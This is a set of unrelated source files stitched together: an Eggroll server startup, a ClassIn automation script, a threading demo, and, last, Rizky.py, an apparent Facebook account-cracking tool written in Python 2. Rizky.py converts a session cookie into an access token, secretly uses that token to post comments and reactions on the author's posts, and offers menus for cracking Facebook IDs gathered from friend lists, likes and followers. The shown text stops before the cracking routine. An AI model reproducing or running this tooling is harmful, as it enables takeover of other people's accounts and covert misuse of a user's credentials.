                 int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_METADATA_SIZE.get())),
                ('grpc.max_send_message_length',
                 int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_MESSAGE_SIZE.get())),
                ('grpc.max_receive_message_length',
                 int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_MESSAGE_SIZE.get())),
                ('grpc.keepalive_time_ms', int(CoreConfKeys.CONFKEY_CORE_GRPC_CHANNEL_KEEPALIVE_TIME_SEC.get()) * 1000),
                ('grpc.keepalive_timeout_ms',
                 int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_KEEPALIVE_TIMEOUT_SEC.get()) * 1000),
                ('grpc.keepalive_permit_without_calls',
                 int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_KEEPALIVE_WITHOUT_CALLS_ENABLED.get())),
                ('grpc.per_rpc_retry_buffer_size',
                 int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_RETRY_BUFFER_SIZE.get())),
                ('grpc.so_reuseport', False)])
        transfer_port = transfer_server.add_insecure_port(f'[::]:{transfer_port}')
        transfer_pb2_grpc.add_TransferServiceServicer_to_server(transfer_servicer,
                                                                transfer_server)
        transfer_server.start()
    pid = os.getpid()
    L.info(f"starting egg_pair service, port: {port}, transfer port: {transfer_port}, pid: {pid}")
    command_server.start()
    cluster_manager = args.cluster_manager
    myself = None
    cluster_manager_client = None
    if cluster_manager:
        # Register this processor with the cluster manager and start heartbeats.
        session_id = args.session_id
        server_node_id = int(args.server_node_id)
        static_er_conf = get_static_er_conf()
        static_er_conf['server_node_id'] = server_node_id
        if not session_id:
            raise ValueError('session id is missing')
        options = {
            SessionConfKeys.CONFKEY_SESSION_ID: args.session_id
        }
        myself = ErProcessor(id=int(args.processor_id),
                             server_node_id=server_node_id,
                             processor_type=ProcessorTypes.EGG_PAIR,
                             command_endpoint=ErEndpoint(host='localhost', port=port),
                             transfer_endpoint=ErEndpoint(host='localhost', port=transfer_port),
                             pid=pid,
                             options=options,
                             status=ProcessorStatus.RUNNING)
        cluster_manager_host, cluster_manager_port = cluster_manager.strip().split(':')
        L.info(f'egg_pair cluster_manager: {cluster_manager}')
        cluster_manager_client = ClusterManagerClient(options={
            ClusterManagerConfKeys.CONFKEY_CLUSTER_MANAGER_HOST: cluster_manager_host,
            ClusterManagerConfKeys.CONFKEY_CLUSTER_MANAGER_PORT: cluster_manager_port
        })
        cluster_manager_client.heartbeat(myself)
        add_runtime_storage('er_session_id', session_id)
    # Windows cannot rely on POSIX signals for stop; use the named-pipe watchdog.
    if platform.system() == "Windows":
        t1 = threading.Thread(target=stop_processor, args=[cluster_manager_client, myself])
        t1.start()
    L.info(f'egg_pair started at port={port}, transfer_port={transfer_port}')
    run = True

    def exit_gracefully(signum, frame):
        # Signal handler only flips the flag; cleanup happens in the main loop.
        nonlocal run
        run = False
        L.info(
            f'egg_pair {args.processor_id} at port={port}, transfer_port={transfer_port}, pid={pid} receives signum={signal.getsignal(signum)}, stopping gracefully.')
    signal.signal(signal.SIGTERM, exit_gracefully)
    signal.signal(signal.SIGINT, exit_gracefully)
    while run:
        time.sleep(1)
    # --- graceful shutdown path ---
    L.info(f'sending exit heartbeat to cm')
    if cluster_manager:
        myself._status = ProcessorStatus.STOPPED
        cluster_manager_client.heartbeat(myself)
    GrpcChannelFactory.shutdown_all_now()
    # todo:1: move to RocksdbAdapter and provide a cleanup method
    from eggroll.core.pair_store.rocksdb import RocksdbAdapter
    RocksdbAdapter.release_db_resource()
    L.info(f'closed RocksDB open dbs')
    gc.collect()
    L.info(f'system metric at exit: {get_system_metric(1)}')
    L.info(f'egg_pair {args.processor_id} at port={port}, transfer_port={transfer_port}, pid={pid} stopped gracefully')
if __name__ == '__main__':
    L.info(f'system metric at start: {get_system_metric(0.1)}')
    # CLI: ports default to '0' (OS-assigned); config file defaults to
    # $EGGROLL_HOME/conf/eggroll.properties when -c is not given.
    args_parser = argparse.ArgumentParser()
    args_parser.add_argument('-d', '--data-dir')
    args_parser.add_argument('-cm', '--cluster-manager')
    args_parser.add_argument('-nm', '--node-manager')
    args_parser.add_argument('-s', '--session-id')
    args_parser.add_argument('-p', '--port', default='0')
    args_parser.add_argument('-t', '--transfer-port', default='0')
    args_parser.add_argument('-sn', '--server-node-id')
    args_parser.add_argument('-prid', '--processor-id', default='0')
    args_parser.add_argument('-c', '--config')
    args = args_parser.parse_args()
    # KeyError here means the eggroll environment is not set up.
    EGGROLL_HOME = os.environ['EGGROLL_HOME']
    configs = configparser.ConfigParser()
    if args.config:
        conf_file = args.config
        L.info(f'reading config path: {conf_file}')
    else:
        conf_file = f'{EGGROLL_HOME}/conf/eggroll.properties'
        L.info(f'reading default config: {conf_file}')
    configs.read(conf_file)
    set_static_er_conf(configs['eggroll'])
    if configs:
        # CLI -d takes precedence; otherwise fall back to the properties file.
        if not args.data_dir:
            args.data_dir = configs['eggroll']['eggroll.data.dir']
    L.info(args)
    serve(args)
|
cl.py | # -*- coding: UTF-8 -*-
import configparser
import pyautogui
import cv2
import time
import winsound
import playsound
import random
import numpy
import win32gui
import win32con
import wmi
import tkinter
import multiprocessing
import os
import win32file
import struct
import requests
import re
from datetime import datetime
from multiprocessing import Process
def pptjsparser(data):
    """Extract slide assets from a ClassIn slide .js payload.

    Returns a (image_urls, text_spans) tuple: the src of every <img id=...>
    tag and the inner text of every <span id=...> element found in *data*.
    """
    img_pattern = re.compile(r'<img id=\".*?\" src="(.*?)"')
    txt_pattern = re.compile(r'<span id.*?>(.*?)<\/span>')
    return img_pattern.findall(data), txt_pattern.findall(data)
class classin:
    """Automation wrapper around the ClassIn client, driven by config.ini
    (sections [outclass], [inclass], [misc]): lesson alarms, auto-click to
    enter class, camera-based nap guard, window minimising and ripping of
    slides/PDFs from ClassIn's local cache."""

    def __init__(self):
        self.config = configparser.ConfigParser()
        self.config.read('config.ini', encoding='utf8')
        # Today's lesson start times as epoch seconds.
        self.lessontime = self._getdaylesson()

    def _getdaylesson(self):
        # Pick today's timetable: weekdays listed in [outclass] L2 use the
        # alternate "Lessiontime2" table, all others use "Lessontime".
        daobj = datetime.now()
        if str(daobj.weekday() + 1) in self.config['outclass']['L2'].split(','):
            return self._Parsetime(self.config['outclass']['Lessiontime2'].split(","))  # some days use the lesson2 timetable
        else:
            return self._Parsetime(self.config['outclass']['Lessontime'].split(","))

    def _Parsetime(self, timelist):
        # Convert "HH:MM" strings into absolute epoch seconds for today.
        leslist = timelist
        now_time = int(time.time())  # NOTE(review): computed but never used
        day_time = int(time.mktime(datetime.now().date().timetuple()))  # today at 00:00
        leslist2 = [day_time + int(i.split(':')[0]) * 3600 + int(i.split(':')[1]) * 60 for i in leslist]
        return leslist2

    def Playsound(self, time=10):
        '''
        Ring the configured alarm sound.
        :param time: playback duration in seconds; has no effect when
            [misc] sound is not 'system' (the custom file plays in full).
            NOTE: this parameter shadows the time module inside the method.
        :return: None
        '''
        if self.config['misc']['sound'] == 'system':
            winsound.Beep(random.randint(100, 10000), time * 1000)
        else:
            playsound.playsound(self.config['misc']['sound'])

    def _Takescreenshot(self):
        # Grab the full screen and convert PIL RGB -> OpenCV BGR.
        image = pyautogui.screenshot()
        img = cv2.cvtColor(numpy.asarray(image), cv2.COLOR_RGB2BGR)
        return img

    def Comparepicture(self, img1, img2, threshold=0.8):
        '''
        Template-match img2 inside img1.
        :param img1: opencv BGR image (e.g. a screenshot)
        :param img2: grayscale template image
        :param threshold: minimum normalized match score
        :return: list of (x, y) top-left coordinates of matches
        '''
        img_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
        res = cv2.matchTemplate(img_gray, img2, cv2.TM_CCOEFF_NORMED)
        loc = numpy.where(res >= threshold)
        # zip the row/col index arrays into (x, y) points.
        return list(zip(*loc[::-1]))

    def Autoclicklesson(self):
        # Within a [-120 s, +160 s] window around a lesson start, and when the
        # per-weekday AutoEnter flag for that lesson slot is '1', maximise the
        # ClassIn window and click the "enter class" button found by template
        # matching against button1.png. Returns True only when a click was made.
        for i in self.lessontime:
            if int(time.time()) > i - 120 and int(time.time()) < i + 160:
                daobj = datetime.now()
                autoconfig = self.config['outclass']['AutoEnter%s' % daobj.isoweekday()].split(',')
                if autoconfig[self.lessontime.index(i)] == '1':
                    win32gui.ShowWindow(win32gui.FindWindow(0, 'classin'), win32con.SW_MAXIMIZE)
                    loc = self.Comparepicture(self._Takescreenshot(), cv2.imread("button1.png", 0))
                    if loc == []:
                        # Button not visible on screen.
                        return False
                    pyautogui.click(loc[0][0] + 5, loc[0][1] + 5)
                    return True
                else:
                    return False
        return False

    def Noticerforenterlesson(self):
        # If a lesson starts within the next 3 minutes: ring the alarm in a
        # child process until the user dismisses the alert dialog.
        # Returns True when an alarm fired, else False.
        for i in self.lessontime:
            if int(time.time()) < i and i - 180 < int(time.time()):
                soundthread = Process(target=self.Playsound, args=(10000,))
                soundthread.start()
                temp1 = pyautogui.alert(text='关闭', title='上课闹钟', button='OK')
                soundthread.terminate()
                return True
        return False

    def Safesleep(self):
        # Nap guard loop: when the webcam cannot deliver a frame it rings for
        # 10 s and retries after Roundtime; otherwise it waits Checktime.
        # NOTE(review): the alarm fires when the camera read FAILS — presumably
        # that means the camera is blocked/off; confirm the intended semantics.
        Roundtime = int(self.config['inclass']['Roundtime'])
        Checktime = int(self.config['inclass']['Checktime'])
        while True:
            camera = cv2.VideoCapture(0)
            if camera.read()[0] == False:
                camera.release()
                cv2.destroyAllWindows()
                self.Playsound(10)
                os.system('cls')
                time.sleep(Roundtime)
            else:
                camera.release()
                cv2.destroyAllWindows()
                time.sleep(Checktime)

    def Findclassroomhandle(self):
        # Return the hwnd of the first top-level window whose title contains
        # 'Classroom', or False when there is none.
        hWndList = []
        win32gui.EnumWindows(lambda hWnd, param: param.append(hWnd), hWndList)  # collect every top-level window handle
        for i in hWndList:
            if 'Classroom' in win32gui.GetWindowText(i):
                return i
        return False

    def Reloadconfig(self):
        # Re-read config.ini and rebuild today's timetable.
        self.config.read('config.ini', encoding='utf8')
        self.lessontime = self._getdaylesson()

    def smallclass(self):
        # Minimise the classroom window; True on success, False when not found.
        uid = self.Findclassroomhandle()
        if uid:
            win32gui.ShowWindow(uid, win32con.SW_MINIMIZE)
            return True
        else:
            return False

    def Init_filewatch(self):
        # Open a directory handle on ClassIn's cache folder for change watching.
        hDir = win32file.CreateFile(
            os.environ['LOCALAPPDATA'] + "\\ClassIn\\cache",  # os.environ['LOCALAPPDATA'] + "\\ClassIn\\cache"
            0x0001,  # FILE_LIST_DIRECTORY access right
            win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE,
            None,
            win32con.OPEN_EXISTING,
            win32con.FILE_FLAG_BACKUP_SEMANTICS,  # required to open a directory handle
            None
        )
        return hDir

    def Fileobserver(self, hDir):
        # Block on ReadDirectoryChangesW; for each changed cache entry parse
        # the embedded source URL (length-prefixed at offset 12), then
        # re-download slide .js payloads (dumping their text and images) or
        # PDFs into [misc] savedir. Returns True when anything changed.
        reqheader = {'Proxy-Connection': 'keep-alive',
                     'Cache-Control': 'max-age=0',
                     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.44 Safari/537.36',
                     'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
                     'Accept-Language': 'zh-CN,zh;q=0.9,ja-JP;q=0.8,ja;q=0.7,en-US;q=0.6,en;q=0.5,zh-HK;q=0.4,zh-SG;q=0.3,zh-MO;q=0.2'}
        okfile = []
        results = win32file.ReadDirectoryChangesW(
            hDir,
            1024000,
            True,
            win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
            win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
            win32con.FILE_NOTIFY_CHANGE_SIZE |
            win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
            0x00000020 |
            0x00000040 |
            win32con.FILE_NOTIFY_CHANGE_SECURITY,
            None,
            None
        )
        for action, file in results:
            okfile.append(os.path.join(os.environ['LOCALAPPDATA'] + "\\ClassIn\\cache", file))
            # okfile.append(os.path.join('C:\\temp\\'+ "cache", file))
        okfile = list(set(okfile))  # de-duplicate repeated change events
        if okfile:
            time.sleep(60)  # let ClassIn finish writing its cache before we read it
            savedir = self.config['misc']['savedir']
            for i in okfile:
                if '.d' not in i:
                    continue
                if 'prepared' in i:
                    continue
                try:
                    with open(i, 'rb') as f:
                        f.seek(12)
                        urllen = struct.unpack('>i', f.read(4))[0]  # big-endian URL length prefix
                        url = f.read(urllen).decode()
                except Exception as e:
                    continue
                filetype = url.split('.')[-1]
                filename = url.split('/')[-1].split('.')[0]
                if '?' in filetype:
                    filetype = filetype.split('?')[0]  # strip query string
                if 'slide' in url and filetype == 'js':
                    # Slide deck id built from three URL path components.
                    pptid = url.split('/')[-6] + url.split('/')[-5] + url.split('/')[-4]
                    filedata = requests.get(url, headers=reqheader).text
                    pptdata = pptjsparser(filedata)
                    try:
                        os.mkdir(savedir + '\\' + pptid)
                    except:
                        pass
                    with open(os.path.join(savedir + '\\' + pptid, filename + '_dump.txt'), 'w+',
                              encoding='utf-8') as f:
                        for j in pptdata[1]:
                            f.write(j + '\n')
                    for j in pptdata[0]:
                        # Rebuild each image URL relative to the slide URL.
                        fileendurl = j.split('/')[1]
                        urltemp1 = url.split('/')
                        newurl = ''
                        for k in urltemp1[:-1]:
                            newurl += k + '/'
                        newurl += fileendurl
                        imgdata = requests.get(newurl, headers=reqheader).content
                        with open(os.path.join(savedir + '\\' + pptid, fileendurl), 'wb') as f:
                            f.write(imgdata)
                elif filetype == 'pdf':
                    filedata = requests.get(url, headers=reqheader).content
                    with open(os.path.join(savedir, filename + '.pdf'), 'wb') as f:
                        f.write(filedata)
                else:
                    continue
            return True
        else:
            return False
def noticerplus(classinobject, sleeptime, return_dict):
    """Poll the lesson notifier until it fires, then flag return_dict[0].

    Intended as a child-process target: sleeps *sleeptime* seconds between
    checks and exits as soon as Noticerforenterlesson() reports True.
    """
    while classinobject.Noticerforenterlesson() != True:
        time.sleep(sleeptime)
    return_dict[0] = True
def observerplus(classinobject, sleeptime):
    """Endless cache-watch loop (child-process target).

    Opens the cache directory watch handle once, then alternates between one
    Fileobserver() pass and a *sleeptime*-second pause, forever.
    """
    watch_handle = classinobject.Init_filewatch()
    while True:
        classinobject.Fileobserver(watch_handle)
        time.sleep(sleeptime)
def tkclose(a):
    # Always-on-top helper window with one button that minimises the ClassIn
    # classroom window (via a.smallclass). Runs in its own process;
    # mainloop() blocks until the window is closed or the process is killed.
    windowtop = tkinter.Tk()
    windowtop.title("***请勿手滑关闭***")
    windowtop.geometry('500x300')
    windowtop.wm_attributes('-topmost', 1)  # keep above the classroom window
    noticetext = tkinter.Label(windowtop, text="用于切换为最小化窗口,请确保程序有管理员权限", width=40, height=2)
    notice2text = tkinter.Label(windowtop, text="请最小化本窗口,并在需要使用时用win+tab切换", width=40, height=2)
    smallclass = tkinter.Button(windowtop, text="使classin最小化", command=a.smallclass)
    noticetext.pack()
    notice2text.pack()
    smallclass.pack()
    windowtop.mainloop()
def main():
    """Supervisor loop: watch for a ClassIn classroom window and switch between
    in-class helpers (nap guard + minimise button) and out-of-class helpers
    (lesson alarm + auto-enter), polling every [outclass] Checktime seconds."""
    print("Classout v1.1 start")
    manager = multiprocessing.Manager()
    return_dict = manager.dict()  # cross-process flag set by noticerplus
    a = classin()
    hdir = a.Init_filewatch()  # NOTE(review): unused — observerplus opens its own handle
    if a.config.getboolean('misc', 'savefile') == True:
        # Optional cache-ripper child process.
        watchThread = Process(target=observerplus, args=(a, int(a.config['outclass']['Checktime'])))
        watchThread.start()
    print('请正确配置完config.ini再运行本程序!')
    # Pre-create the child-process objects so .is_alive() is safe before start.
    sleepproc = Process(target=a.Safesleep, args=())
    closeproc = Process(target=tkclose, args=(a,))
    noticeproc = Process(target=noticerplus, args=(a, int(a.config['outclass']['Checktime']), return_dict))
    outclassnoticed = 0  # latch: out-of-class mode already announced
    inclassnoticed = 0   # latch: in-class mode already announced
    noticenoticed = 0    # latch: alarm already fired for the upcoming lesson
    return_dict[0] = 0
    while True:
        islesson = a.Findclassroomhandle()
        if islesson:
            if not inclassnoticed:
                # Transition: entering class — stop the alarm, start the guards.
                print("检测到classroom窗口,进入上课模式")
                if noticeproc.is_alive():
                    noticeproc.terminate()
                if a.config.getboolean('inclass', 'Notice'):
                    sleepproc = Process(target=a.Safesleep, args=())
                    sleepproc.start()
                closeproc = Process(target=tkclose, args=(a,))
                closeproc.start()
                inclassnoticed = 1
                outclassnoticed = 0
                noticenoticed = 0
                return_dict[0] = 0
        if not islesson:
            if not outclassnoticed:
                # Transition: leaving class — stop the in-class helpers.
                print("检测到已退出classroom,进入下课模式")
                if sleepproc.is_alive():
                    sleepproc.terminate()
                if closeproc.is_alive():
                    closeproc.terminate()
                outclassnoticed = 1
                inclassnoticed = 0
            a.Autoclicklesson()
            if return_dict[0] == True:
                noticenoticed = 1
            # (Re)start the alarm watcher until it has fired once.
            if not noticenoticed and not noticeproc.is_alive() and a.config.getboolean('outclass', 'Notice'):
                noticeproc = Process(target=noticerplus, args=(a, int(a.config['outclass']['Checktime']), return_dict))
                noticeproc.start()
        time.sleep(int(a.config['outclass']['Checktime']))
if __name__ == '__main__':
    multiprocessing.freeze_support()  # required for frozen Windows executables
    main()
    b = classin()  # NOTE(review): unreachable in practice — main() never returns
|
threadtest.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import arm.arm_controler as ac
import arm.servo_controler as sc
from core.board import Board
from arm.chess_machine import ChessMachine
import threading
from time import sleep
class Dest:
    """Tiny shared-state holder: a single string slot, mutated from several
    threads in the demo below."""

    def __init__(self):
        # Initial value; the worker threads overwrite this repeatedly.
        self.st = "prichan"
class overall:
    """Demo of two loops mutating one shared Dest instance from different
    threads; every method loops forever, so this is observation-only code."""

    def test(self):
        # Worker loop: overwrite the shared slot with "hello" once a second.
        while True:
            self.dest.st = "hello"
            print(self.dest.st)
            sleep(1)

    def tests(self):
        # Alternate worker: writes "prichan" once a second.
        # NOTE(review): not used by subete().
        while True:
            self.dest.st = "prichan"
            print(self.dest.st)
            sleep(1)

    def subete(self):
        # Entry point: create the shared object, run test() in a thread, and
        # keep writing "prichan" from the main thread — the printed output
        # interleaves both writers, demonstrating the race on dest.st.
        self.dest = Dest()
        print(self.dest.st)
        th = threading.Thread(target=self.test)
        th.start()
        while True:
            self.dest.st = "prichan"
            print(self.dest.st)
            sleep(0.5)
if __name__ == '__main__':
    # Runs the interleaving demo; never returns.
    overall().subete()
Rizky.py | #!/usr/bin/python2
# coding=utf-8
'''
DECRYPT BY MAHMUD AZIM (MR. ERROR)
'''
import os,re,sys,itertools,time,requests,random,threading,json,random
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
reload(sys)
sys.setdefaultencoding('utf8')  # Python 2 only: force utf-8 default encoding
#### LOADING ####
os.system('clear')  # wipe the terminal before drawing the loading animation
done = False  # shared flag: the animate() thread spins until this flips to True
def animate():
    # Spinner thread: repaint a coloured "Loading" bar every 100 ms, cycling
    # through four glyphs, until the module-level `done` flag is set.
    for c in itertools.cycle(['\033[0;96m|', '\033[0;92m/', '\033[0;95m-', '\033[0;91m\\']):
        if done:
            break
        sys.stdout.write('\r\033[0;93mLoading ' + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c )
        sys.stdout.flush()
        time.sleep(0.1)
t = threading.Thread(target=animate)
t.start()
time.sleep(5)  # show the loading animation for five seconds...
done = True    # ...then signal the spinner thread to stop
### KELUAR ###
def keluar():
    """Print the exit banner and terminate the process via SystemExit."""
    print("! Exit")
    os.sys.exit()
### JALAN ###
def jalan(z):
    """Typewriter effect: emit *z* plus a trailing newline one character at a
    time, flushing after each, with a 30 ms pause between characters."""
    text = z + '\n'
    for ch in text:
        sys.stdout.write(ch)
        sys.stdout.flush()
        time.sleep(0.03)
### LOGO ###
# ANSI-coloured ASCII banner printed at the top of every menu screen.
logo = ("""\033[0;91m _____ _ ____ _ ____
| ___| |__ / ___|_ __ __ _ ___| | _____ _ _|___ \
| |_ | '_ \| | | '__/ _` |/ __| |/ / _ \ '__|__) |
\033[0;97m| _| | |_) | |___| | | (_| | (__| < __/ | / __/
|_| |_.__/ \____|_| \__,_|\___|_|\_\___|_| |_____
\033[0;93m──────────────────────────────────────────────────────
\033[0;95m{\033[0;96m×\033[0;95m} \033[0;93mAuthor \033[0;91m: \033[0;96mMuhammad Rizky
\033[0;95m{\033[0;96m×\033[0;95m} \033[0;93mGithub \033[0;91m: \033[0;96mGithub.com/RIZKY4/cr4ck
\033[0;95m{\033[0;96m×\033[0;95m} \033[0;93mFacebook \033[0;91m: \033[0;96mFacebook.com/Rizky.Rasata""")
# Shared mutable module state used by the worker threads (defined elsewhere).
back = 0
threads = []
berhasil = []   # successful results
cekpoint = []   # checkpointed accounts
oks = []
oke = []
id = []         # NOTE(review): shadows the id() builtin
fbid = []
##### MASUK #####
def masuk():
    # Main menu (Python 2): clear the screen, draw the banner, list the login
    # options, then hand control to the input dispatcher.
    os.system('clear')
    print logo
    print 52* ('\033[0;93m─');time.sleep(0.07)
    print ('\033[0;92m1.\033[0;97m Login Via Token Facebook');time.sleep(0.07)
    print ('\033[0;92m2.\033[0;97m Login Via Cookie Facebook');time.sleep(0.07)
    print ('\033[0;92m3.\033[0;97m Ambil Token Dari Link');time.sleep(0.07)
    print ('\033[0;91m0.\033[0;97m Keluar');time.sleep(0.07)
    print 52* ('\033[0;93m─');time.sleep(0.07)
    pilih_masuk()
#### PILIH MASUK ####
def pilih_masuk():
    # Read the menu choice and dispatch to the matching login flow;
    # re-prompts (recursively) on empty or unknown input.
    msuk = raw_input('\033[0;92m>\033[0;97m ')
    if msuk =="":
        print '\033[0;91m! Isi Yg Benar'
        pilih_masuk()
    elif msuk =="1":
        login_token()
    elif msuk =="2":
        login_cookie()
    elif msuk =="3":
        ambil_link()
    elif msuk =="0":
        keluar()
    else:
        print"\033[0;91m! Isi Yg Benar"
        pilih_masuk()
#### LOGIN_TOKEN ####
def login_token():
    # Validate a Facebook access token against the Graph API; on success save
    # it to login.txt and continue to the comment bot. Invalid tokens fall
    # through to a KeyError (missing 'name') and return to the main menu.
    os.system('clear')
    print logo
    print 50* '\033[0;93m─'
    toket = raw_input("\033[0;95m•\033[0;97m Token \033[0;91m:\033[0;92m ")
    try:
        otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
        a = json.loads(otw.text)
        nama = a['name']  # raises KeyError when the token is invalid
        zedd = open("login.txt", 'w')
        zedd.write(toket)
        zedd.close()
        print '\033[0;92m√ Login Berhasil'
        os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
        bot_komen()
    except KeyError:
        print '\033[1;91m! Token salah '
        time.sleep(1.7)
        masuk()
    except requests.exceptions.SSLError:
        print '! Koneksi Bermasalah'
        exit()
#### LOGIN COOKIES ####
def login_cookie():
    # Exchange an m.facebook.com session cookie for an EAAA... access token by
    # scraping the composer async_loader page, then persist it to login.txt.
    os.system('clear')
    print logo
    print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
    try:
        cookie = raw_input("\033[0;95m•\033[0;97m Cookie \033[0;91m:\033[0;92m ")
        data = {
            'user-agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36', # don't change this user agent.
            'referer' : 'https://m.facebook.com/',
            'host' : 'm.facebook.com',
            'origin' : 'https://m.facebook.com',
            'upgrade-insecure-requests' : '1',
            'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
            'cache-control' : 'max-age=0',
            'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'content-type' : 'text/html; charset=utf-8',
            'cookie' : cookie }
        coki = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers = data)
        cari = re.search('(EAAA\w+)', coki.text)  # access-token pattern in the page
        hasil = cari.group(1)  # AttributeError here -> no token found -> bad cookie
        zedd = open("login.txt", 'w')
        zedd.write(hasil)
        zedd.close()
        print '\033[0;92m√ Login Berhasil'
        time.sleep(2)
        bot_komen()
    except AttributeError:
        print '\033[0;91m! Cookie Salah'
        time.sleep(2)
        masuk()
    except UnboundLocalError:
        print '\033[0;91m! Cookie Salah'
        time.sleep(2)
        masuk()
    except requests.exceptions.SSLError:
        os.system('clear')
        print '\033[0;91m! Koneksi Bermasalah'
        exit()
##### AMBIL LINK #####
def ambil_link():
os.system("clear")
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
jalan("\033[0;92mDilarang Menggunakan Akun Facebook Lama...")
jalan("\033[0;92mWajib Menggunakan Akun Facebook Baru ...")
os.system ("cd ... && npm install")
jalan ("\033[0;96mMulai...")
os.system ("cd ... && npm start")
raw_input("\n[ Kembali ]")
masuk()
#### BOT KOMEN ####
def bot_komen():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
kom = ('Gw Pake Sc Lu Bang 😘')
reac = ('ANGRY')
post = ('937777953338365')
post2 = ('938954086554085')
kom2 = ('Mantap Bang 😁')
reac2 = ('LOVE')
requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/reactions?type=' +reac+ '&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post2+'/reactions?type=' +reac2+ '&access_token='+ toket)
menu()
#### MENU ####
def menu():
os.system('clear')
try:
toket = open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid '
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me/?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\033[0;91m ! Token invalid'
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
os.system("clear")
print (logo);time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
jalan ("\033[0;96m•\033[0;95m WELCOME\033[0;90m =>\033[0;92m " +nama);time.sleep(0.07)
jalan ("\033[0;96m•\033[0;95m USER ID\033[0;90m =>\033[0;92m " +id);time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;95m1.\033[0;97m Crack ID Dari Teman/Publik');time.sleep(0.07)
print ('\033[0;95m2.\033[0;97m Crack ID Dari Like Teman/Publik');time.sleep(0.07)
print ('\033[0;95m3.\033[0;97m Crack ID Dari Followers');time.sleep(0.07)
print ('\033[0;95m4.\033[0;97m Cari ID Menggunakan Username');time.sleep(0.07)
print ('\033[0;95m5.\033[0;97m Lihat Hasil Crack');time.sleep(0.07)
print ('\033[0;95m6.\033[0;97m Perbarui Script');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Keluar Akun');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_menu()
### PILIH MENU ###
def pilih_menu():
peler = raw_input('\033[0;95m>\033[0;97m ')
if peler =="":
print '\033[0;91m ! Isi Yg Benar'
pilih_menu()
elif peler == "1":
crack_teman()
elif peler == "2":
crack_like()
elif peler == "3":
crack_follow()
elif peler == "4":
cari_id()
elif peler == "5":
hasil_crack()
elif peler == "6":
perbarui()
elif peler == "0":
print '\033[0;91mMenghaspus Token ...'
time.sleep(1)
os.system('rm -rf login.txt')
keluar()
else:
print '\033[0;91m ! Isi Yg Benar'
pilih_menu()
##### CRACK TEMAN/PUBLIK #####
def crack_teman():
os.system("clear")
print (logo);time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;93m1.\033[0;97m Crack ID Indonesia');time.sleep(0.07)
print ('\033[0;93m2.\033[0;97m Crack ID Bangladesh');time.sleep(0.07)
print ('\033[0;93m3.\033[0;97m Crack ID Pakistan');time.sleep(0.07)
print ('\033[0;93m4.\033[0;97m Crack ID Usa');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_teman()
### PILIH TEMAN ###
def pilih_teman():
uki = raw_input('\033[0;93m>\033[0;97m ')
if uki =="":
print '\033[0;91m! Isi Yg Benar'
pilih_teman()
elif uki == "1":
crack_indo()
elif uki == "2":
crack_bangla()
elif uki == "3":
crack_pakis()
elif uki == "4":
crack_usa()
elif uki == "0":
menu()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_teman()
##### CRACK INDONESIA #####
def crack_indo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;96m1.\033[0;97m Crack Dari Daftar Teman');time.sleep(0.07)
print ('\033[0;96m2.\033[0;97m Crack Dari Publik/Teman');time.sleep(0.07)
